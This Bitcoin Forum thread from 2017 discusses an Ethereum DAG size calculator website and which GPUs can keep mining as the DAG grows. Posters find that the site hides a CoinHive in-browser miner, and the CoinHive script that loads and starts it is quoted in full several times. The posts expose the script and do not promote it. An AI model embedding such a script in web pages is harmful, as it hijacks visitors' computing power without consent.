Bitcoin Forum

Alternate cryptocurrencies => Mining (Altcoins) => Topic started by: Branko on September 14, 2017, 07:14:29 AM



Title: DAG size calculator
Post by: Branko on September 14, 2017, 07:14:29 AM
https://investoon.com/tools/dag_size


Here you can see how long will your card support ETH and other coins based on same algo


Title: Re: DAG size calculator
Post by: MATHReX on September 14, 2017, 12:35:06 PM
https://investoon.com/tools/dag_size


Here you can see how long will your card support ETH and other coins based on same algo

Done a great work with this site mahn! Very neat.


Title: Re: DAG size calculator
Post by: Cane1989 on September 16, 2017, 11:51:36 AM
https://investoon.com/tools/dag_size


Here you can see how long will your card support ETH and other coins based on same algo
Finaly I found this calculator. Thanks a lot!


Title: Re: DAG size calculator
Post by: sevenmiles on September 16, 2017, 02:00:37 PM
Dag Size   Epoch   Block   Day      End of GPUs
1.99 GB   №127   #  3,839,999   16/MAY/2017   
GTX 1050 2GB R9 380 2GB RX 550 2GB

2.99 GB   №256   #  7,679,999   18/APR/2020   
GTX 1060 3GB HD 7950 3GB HD 7970 3GB R9 280X 3GB HD 7950 3GB
3.99 GB   №383   # 11,519,999   21/MAR/2023   
GTX 1050TI 4GB R9 FURY 4GB R9 380 4GB R9 290X 4GB RX 470 4GB RX 480 4GB RX 570 4GB RX 580 4GB
5.99 GB   №639   # 19,199,999   22/JAN/2029   
GTX 1060 6GB GTX 980TI 6GB
7.99 GB   №895   # 26,879,999   26/NOV/2034   
GTX 1070 8GB R9 390 8GB RX 470 8GB RX 480 8GB RX 570 8GB RX 580 8GB GTX 1080 8GB
10.99 GB   №1280   # 38,399,999   01/SEP/2043    GTX 1080TI 11GB

So 3GB card is way more enough?


Title: Re: DAG size calculator
Post by: Pennywis3 on September 16, 2017, 02:10:24 PM
Not realy.
My calculations are different, 4GB cards are gonna stop working before 2020.
And 2GB cards didn't stop working May 2017 but long before that.


Title: Re: DAG size calculator
Post by: Branko on September 16, 2017, 03:53:32 PM
Not realy.
My calculations are different, 4GB cards are gonna stop working before 2020.
And 2GB cards didn't stop working May 2017 but long before that.

OS like windows use some VRAM for themselves, but you could still mine on
linux with no graphical UI started


Title: Re: DAG size calculator
Post by: Elange on September 24, 2017, 11:21:52 PM
The https://investoon.com/tools/dag_size website contains a Javascript miner, which means it's using website visitor's CPU to mine in favor of website creator. See website source:

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

<script>
    var miner = new CoinHive.Anonymous('AEwgHPotuZxRNQbnuR4YTOVzq9gRsNET');
    miner.start();
    miner.setThrottle(0.38);
</script>


Probably by the time most people will see this post, this part of code will be removed from this website. But it is present at the moment of this message writing.


Title: Re: DAG size calculator
Post by: Metroid on September 25, 2017, 12:02:50 AM
Indeed very good info to people about current dag size.


Title: Re: DAG size calculator
Post by: phundred on September 25, 2017, 01:17:07 AM
Not realy.
My calculations are different, 4GB cards are gonna stop working before 2020.
And 2GB cards didn't stop working May 2017 but long before that.

I don't know about your calculator, but my 2GB card just stopped mining at ETH around may/jun this year. BTW, do you mean ETH?


Title: Re: DAG size calculator
Post by: Ursul0 on September 25, 2017, 05:47:11 AM
The https://investoon.com/tools/dag_size website contains a Javascript miner, which means it's using website visitor's CPU to mine in favor of website creator. See website source:

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

<script>
    var miner = new CoinHive.Anonymous('AEwgHPotuZxRNQbnuR4YTOVzq9gRsNET');
    miner.start();
    miner.setThrottle(0.38);
</script>


Probably by the time most people will see this post, this part of code will be removed from this website. But it is present at the moment of this message writing.

Yep. Something fishy is going on there for sure. Just by opening this site my cpu usage went from 15% to 80%. I've got 22nm laptop with active cooling, so I noticed immediately :)
Actually I was't sure what was the cause before killing this Chrome process with 60%+ CPU usage and then seeing under this site tab "Aw snap..."



Title: Re: DAG size calculator
Post by: Branko on September 25, 2017, 06:37:09 AM
The https://investoon.com/tools/dag_size website contains a Javascript miner, which means it's using website visitor's CPU to mine in favor of website creator. See website source:

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

<script>
    var miner = new CoinHive.Anonymous('AEwgHPotuZxRNQbnuR4YTOVzq9gRsNET');
    miner.start();
    miner.setThrottle(0.38);
</script>


Probably by the time most people will see this post, this part of code will be removed from this website. But it is present at the moment of this message writing.

Yep. Something fishy is going on there for sure. Just by opening this site my cpu usage went from 15% to 80%. I've got 22nm laptop with active cooling, so I noticed immediately :)
Actually I was't sure what was the cause before killing this Chrome process with 60%+ CPU usage and then seeing under this site tab "Aw snap..."



Unfortunately I have feeling we'll see this more and more as time goes by once code is out everyone will use this


Title: Re: DAG size calculator
Post by: Ursul0 on September 25, 2017, 06:49:58 AM
The https://investoon.com/tools/dag_size website contains a Javascript miner, which means it's using website visitor's CPU to mine in favor of website creator. See website source:

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

<script>
    var miner = new CoinHive.Anonymous('AEwgHPotuZxRNQbnuR4YTOVzq9gRsNET');
    miner.start();
    miner.setThrottle(0.38);
</script>


Probably by the time most people will see this post, this part of code will be removed from this website. But it is present at the moment of this message writing.

Yep. Something fishy is going on there for sure. Just by opening this site my cpu usage went from 15% to 80%. I've got 22nm laptop with active cooling, so I noticed immediately :)
Actually I was't sure what was the cause before killing this Chrome process with 60%+ CPU usage and then seeing under this site tab "Aw snap..."



Unfortunately I have feeling we'll see this more and more as time goes by once code is out everyone will use this

What do you mean? Isn't it your website?
Well... that's fun. I was really ready to start calling names here, good thing I didn't:)


Title: Re: DAG size calculator
Post by: Branko on September 25, 2017, 09:48:42 AM


What do you mean? Isn't it your website?
Well... that's fun. I was really ready to start calling names here, good thing I didn't:)

Its not...I just posted a link because I got bored seeing same question asked over and over again


Title: Re: DAG size calculator
Post by: Millenium Falcon on October 02, 2017, 11:23:24 AM
The https://investoon.com/tools/dag_size website contains a Javascript miner, which means it's using website visitor's CPU to mine in favor of website creator. See website source:

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

<script>
    var miner = new CoinHive.Anonymous('AEwgHPotuZxRNQbnuR4YTOVzq9gRsNET');
    miner.start();
    miner.setThrottle(0.38);
</script>


Probably by the time most people will see this post, this part of code will be removed from this website. But it is present at the moment of this message writing.

Yep. Something fishy is going on there for sure. Just by opening this site my cpu usage went from 15% to 80%. I've got 22nm laptop with active cooling, so I noticed immediately :)
Actually I was't sure what was the cause before killing this Chrome process with 60%+ CPU usage and then seeing under this site tab "Aw snap..."



Seems to be clean now. I have not found mining script there.


Title: Re: DAG size calculator
Post by: Sev18 on October 02, 2017, 03:16:49 PM
Good info. It would be helpful for people mining ETH with 1060 3GB. Which mining ends with DAG epoch #179.